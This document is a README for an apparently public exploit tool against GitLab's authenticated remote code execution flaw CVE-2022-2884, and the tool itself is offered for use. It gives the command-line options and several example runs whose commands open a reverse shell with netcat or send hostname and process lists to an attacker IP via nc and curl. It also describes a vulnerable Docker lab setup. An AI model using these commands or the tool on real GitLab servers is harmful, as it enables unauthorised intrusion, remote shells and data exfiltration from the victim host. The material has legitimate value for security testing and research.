# gitlab_rce_cve-2022-2884

This is a Python3 program that exploits GitLab authenticated RCE vulnerability known as CVE-2022-2884.

## DISCLAIMER

**This tool is intended for security engineers and appsec people for security assessments. Please use this tool responsibly. I do not take responsibility for the way in which any one uses this application. I am NOT responsible for any damages caused or any crimes committed by using this tool.**

## Vulnerability info

* **CVE-ID**: CVE-2022-2884
* **Link**: [https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2884](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2884)
* **Description**: A vulnerability in GitLab CE/EE affecting all versions from 11.3.4 prior to 15.1.5, 15.2 to 15.2.3, 15.3 to 15.3 to 15.3.1 allows an authenticated user to achieve remote code execution via the Import from GitHub API endpoint.
* **Vendor link**: [https://about.gitlab.com/releases/2022/08/22/critical-security-release-gitlab-15-3-1-released/](https://about.gitlab.com/releases/2022/08/22/critical-security-release-gitlab-15-3-1-released/)

## Help

```
$ ./gitlab_rce_cve-2022-2884.py --help
usage: gitlab_rce_cve-2022-2884.py [-h] -u URL -pt PRIVATE_TOKEN [-tn TARGET_NAMESPACE] -a ADDRESS [-p PORT] [-s] -c COMMAND [-d DELAY] [-v]

Exploit for GitLab authenticated RCE vulnerability known as CVE-2022-2884. - v1.0 (2022-12-25)

optional arguments:
  -h, --help            show this help message and exit
  -u URL, --url URL     URL of the victim GitLab
  -pt PRIVATE_TOKEN, --private-token PRIVATE_TOKEN
                        private token of GitLab
  -tn TARGET_NAMESPACE, --target-namespace TARGET_NAMESPACE
                        target namespace of GitLab (default is 'root')
  -a ADDRESS, --address ADDRESS
                        IP address of the attacker machine
  -p PORT, --port PORT  TCP port of the attacker machine (default is 1337)
  -s, --https           set if the attacker machine is exposed via HTTPS
  -c COMMAND, --command COMMAND
                        the command to execute
  -d DELAY, --delay DELAY
                        seconds of delay to wait for the exploit to complete
  -v, --verbose         verbose mode
```

## Examples

```
./gitlab_rce_cve-2022-2884.py -u http://victim.gitlab.server -pt "glpat-YourGitLabPrivateToken" -a 1.2.3.4 -c "id | nc 1.2.3.4 6669"
```

```
./gitlab_rce_cve-2022-2884.py -u http://victim.gitlab.server -pt "glpat-YourGitLabPrivateToken" -a 1.2.3.4 -c "nc 1.2.3.4 6669 -e /bin/bash"
```

```
./gitlab_rce_cve-2022-2884.py -u http://victim.gitlab.server -pt "glpat-YourGitLabPrivateToken" -a 1.2.3.4 -c "(hostname; ps aux) | curl 1.2.3.4:6669 -X POST --data-binary @- "
```

```
./gitlab_rce_cve-2022-2884.py -u http://victim.gitlab.server -pt "glpat-YourGitLabPrivateToken" -a 1.2.3.4 -c "echo 'test' > /tmp/test"
```

```
./gitlab_rce_cve-2022-2884.py -u http://victim.gitlab.server -pt "glpat-YourGitLabPrivateToken" -a 1.2.3.4 -c "nc 1.2.3.4 6669 -e /bin/bash" -d 180
```

```
./gitlab_rce_cve-2022-2884.py -v -u http://victim.gitlab.server -pt "glpat-YourGitLabPrivateToken" -a 1.2.3.4 -p 1337 -c "nc 1.2.3.4 6669 -e /bin/bash"
```

```
./gitlab_rce_cve-2022-2884.py -u http://victim.gitlab.server -pt "glpat-YourGitLabPrivateToken" -tn root -a 1.2.3.4 -p 1337 -s -c "nc 1.2.3.4 6669 -e /bin/bash"
```

## Vulnerable application

A vulnerable application can be setup with the following commands.

```
export GITLAB_HOME=/srv/gitlab
docker run --detach --rm \
           --hostname gitlab.example.com \
           --publish 443:443 --publish 80:80 --publish 22:22 \
           --name vuln-gitlab \
           --volume $GITLAB_HOME/config:/etc/gitlab \
           --volume $GITLAB_HOME/logs:/var/log/gitlab \
           --volume $GITLAB_HOME/data:/var/opt/gitlab \
           --shm-size 256m \
           gitlab/gitlab-ce:15.3.0-ce.0
```

It might take a while before the Docker container starts to respond to queries. Then connect to `http://localhost`.

Sign in with the username `root` and the password from the following command.

```
docker exec -it vuln-gitlab grep 'Password:' /etc/gitlab/initial_root_password
```

To test the exploit locally, you have to add `--network="host"` to the `docker run` command and to remove constraints for outbound requests on GitLab:
* connect to [http://localhost/admin/application_settings/network](http://localhost/admin/application_settings/network);
* expand "*Outbound requests*" section;
* tick "*Allow requests to the local network from web hooks and services*";
* add `127.0.0.1` to the "*Local IP addresses and domain names that hooks and services may access*" textbox;
* save changes.

The prerequisite of the exploit is to have a private token on GitLab:
* connect to [http://localhost/-/profile/personal_access_tokens](http://localhost/-/profile/personal_access_tokens);
* generate a token with at least `api` scope.

## Authors

* **Antonio Francesco Sardella** - *main implementation* - [m3ssap0](https://github.com/m3ssap0)

## License

See the [LICENSE](LICENSE) file for details.

## Acknowledgments

* [yvvdwf](https://hackerone.com/reports/1672388), the security researcher who discovered the vulnerability.
